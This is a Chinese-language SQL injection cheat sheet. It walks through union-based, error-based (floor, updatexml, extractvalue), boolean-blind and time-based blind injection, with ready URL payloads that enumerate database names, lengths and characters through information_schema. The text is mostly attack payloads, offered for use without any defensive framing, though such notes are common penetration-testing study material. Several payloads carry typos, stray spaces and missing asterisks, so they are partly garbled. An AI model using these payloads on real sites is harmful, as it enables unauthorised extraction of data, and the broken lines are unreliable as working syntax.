(1)联合查询注入
前提:页面上有显示位
1.UNION手工利用过程:
判断整形还是字符型
判断查询列数
判断显示位
获取所有数据库名
获取所有表名
获取列名
获取字段中的数据
通过order by 用二分法判断列数
接下来就通过information_schema表查询数据库,表和字段;
(2)报错型注入
前提:页面没有显示位,但有SQL语句执行错误信息输出
PHP.INI中display_errors=ON开启错误回显
常用函数:
1.floor报错:
and (select 1 from (select count(),concat((payload),floor (rand(0)2))x from information_schema.tables group by x)a)
2.updataxml报错:
and updatexml(1,payload,1) and updatexml(1, concat(0x7e,@@version,0x7e),1)
3.通过ExtractValue报错
and extractvalue(1, payload) and extractvalue(1, concat(0x7e,@@version,0x7e))
(3)布尔型盲注
前提:页面中没有显示位,没有输出SQL语句执行错误信息。只能通过页面显示正常不正常;
缺点:耗费时间太长,速度太慢
常用函数:
1.substr()函数
作用:截取字符串
用法:substr(string,num start,num length) string为字符串—start 为起始位置—length 位长度
select substr(‘abc’,’1′,’1′); ———— a
2.ascii()函数
作用:返回字符串str的ascii码值。如果str是空字符串,返回0,如果是NULL,返回NULL
selelt ascii(‘a’); —————-97
注入过程:
?id=1 and (selelct count(schema_name) from information_schema.schemata)>8 //判断数据库个数
?id=1 and (selece length(schema_name) from information_schema.schemata limit 0,1)>18//判断第一个数据库长度
?id=1 and (select ascii(substr(select schema_name from information_schema.schemata limit 0,1),1,1))
?id=1 and (select ascii(substr(select schema_name from information_schema.schemata limit 0,1),2,1))
(4)时间盲注
前提:页面上没有显示位,也没有输出SQL语句执行错误信息。 正 确的SQL语句和错误的SQL语句返回页面都一样,但是加入sleep(5)条 件之后,页面的返回速度明显慢了5秒。
常用函数:
IF()函数:
if(condition,A,B)函数
当condition为真,返回A,为假,返回B
注入过程:
?id=1 and if((select count(schema_name) from information_schema. schemata)=9,sleep(5),1) //判断数据库个数
?id=1 and if((select length(schema_name) from information_schem a.schemata limit 0,1)=18,sleep(5),1)//判断第一个数据库名有多少个字符
?id=1 and if((select ascii(substr((select schema_name from info rmation_schema.schemata limit 0,1),1,1)))=105,sleep(5),1)//判断 第一个库第一个字符
?id=1 and if((select ascii(substr((select schema_name from info rmation_schema.schemata limit 0,1),2,1)))=110,sleep(5),1)//判断 第一个库第二个字符